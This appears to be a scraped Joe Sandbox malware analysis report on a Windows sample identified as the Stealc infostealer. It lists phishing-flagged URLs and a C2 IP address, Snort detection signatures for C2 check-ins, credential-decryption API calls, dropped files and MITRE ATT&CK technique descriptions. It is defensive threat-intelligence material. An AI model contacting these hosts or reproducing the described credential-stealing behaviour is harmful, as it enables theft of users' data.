Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: S@
API String ID: 1357844191-3728227104
Opcode ID: ecd23e64d1192b6ba9de46e6b99e2d0a9563e48b1e2e0e6d45d313f2f55349e9
Instruction ID: 9c137a0b8e6594087cbdb0d3573fec948ffd7aef8cac9f9289ba4ed5725b918d
Opcode Fuzzy Hash: ecd23e64d1192b6ba9de46e6b99e2d0a9563e48b1e2e0e6d45d313f2f55349e9
Instruction Fuzzy Hash: 5FB09B3104070CFBCF001BD5EC0E9CD7F5DE784651F04D001F60E450A0CA7190508751

Uniqueness

Uniqueness Score: -1.00%

Source: http://ronaldlitt.top/25d4fc7fb0cb6b78.php	Avira URL Cloud: Label: phishing
Source: http://ronaldlitt.top/25d4fc7fb0cb6b78.phption:	Avira URL Cloud: Label: phishing
Source: http://ronaldlitt.top/3abdf8b5527012d0/sqlite3.dll	Avira URL Cloud: Label: phishing

Source: C:\Users\user\Desktop\un78exGoa4.exe	Code function: 0_2_0040551E LocalAlloc,StrStrA,memcmp,CryptUnprotectData,LocalAlloc,LocalFree,	0_2_0040551E
Source: C:\Users\user\Desktop\un78exGoa4.exe	Code function: 0_2_0040F02C CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_0040F02C
Source: C:\Users\user\Desktop\un78exGoa4.exe	Code function: 0_2_0040C3A0 RegEnumValueA,lstrcat,lstrcat,StrStrA,GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,lstrcpy,GetProcessHeap,HeapFree,lstrcat,lstrcpy,wsprintfA,lstrcat,lstrcat,RegEnumValueA,	0_2_0040C3A0
Source: C:\Users\user\Desktop\un78exGoa4.exe	Code function: 0_2_0040715C memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	0_2_0040715C
Source: C:\Users\user\Desktop\un78exGoa4.exe	Code function: 0_2_00405430 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00405430

Source: Traffic	Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.5:65323 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49711 -> 193.106.175.215:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49712 -> 193.106.175.215:80
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49713 -> 193.106.175.215:80

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report un78exGoa4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BGDAAKJJDAAKFHJKJKFCAEHDAF

C:\ProgramData\BYIMNPJCRL.xlsx

C:\ProgramData\CZQKSDDMWR.xlsx

C:\ProgramData\DUKNXICOZT.docx

C:\ProgramData\DUKNXICOZT.xlsx

C:\ProgramData\FCFIJEBF

C:\ProgramData\GIGIYTFFYT.docx

C:\ProgramData\GLTYDMDUST.docx

C:\ProgramData\GNLQNHOLWB.docx

C:\ProgramData\HDHCGHDHIDHCBGCBGCAE

C:\ProgramData\HVLFEFMHHB.xlsx

C:\ProgramData\JDDHMPCDUJ.docx

C:\ProgramData\KLIZUSIQEN.docx

C:\ProgramData\KLIZUSIQEN.xlsx

C:\ProgramData\QCOILOQIKC.docx

C:\ProgramData\QCOILOQIKC.xlsx

Windows Analysis Report
un78exGoa4.exe

Function 0040C550 Relevance: 118.0, APIs: 78, Instructions: 966
stringregistrymemoryCOMMON

Function 00409C83 Relevance: 72.6, APIs: 38, Strings: 3, Instructions: 895
memoryregistrytimeCOMMON

Function 0040F49D Relevance: 56.2, APIs: 31, Strings: 1, Instructions: 159
libraryloaderCOMMON

Function 0040B202 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 219
filestringCOMMON

Function 0040BF33 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 157
stringfileCOMMON

Function 0040C3A0 Relevance: 27.1, APIs: 18, Instructions: 137
stringmemoryregistryCOMMON

Function 0040397F Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 379
networkstringfileCOMMON

Function 0040B62A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 132
stringfileCOMMON

Function 00406BD7 Relevance: 18.4, APIs: 12, Instructions: 382
fileCOMMON

Function 0040117A Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 347
fileCOMMON

Function 0040551E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116
memoryencryptionCOMMON

Function 0040E91A Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80
memoryCOMMON

Function 004086F1 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 414
fileCOMMON

Function 0040ED7B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
processCOMMON

Function 0040F02C Relevance: 6.0, APIs: 4, Instructions: 50
memoryencryptionCOMMON

Function 0040E8AD Relevance: 4.5, APIs: 3, Instructions: 19
memoryCOMMON

Function 0040DA76 Relevance: 422.8, APIs: 228, Strings: 13, Instructions: 1072
stringCOMMON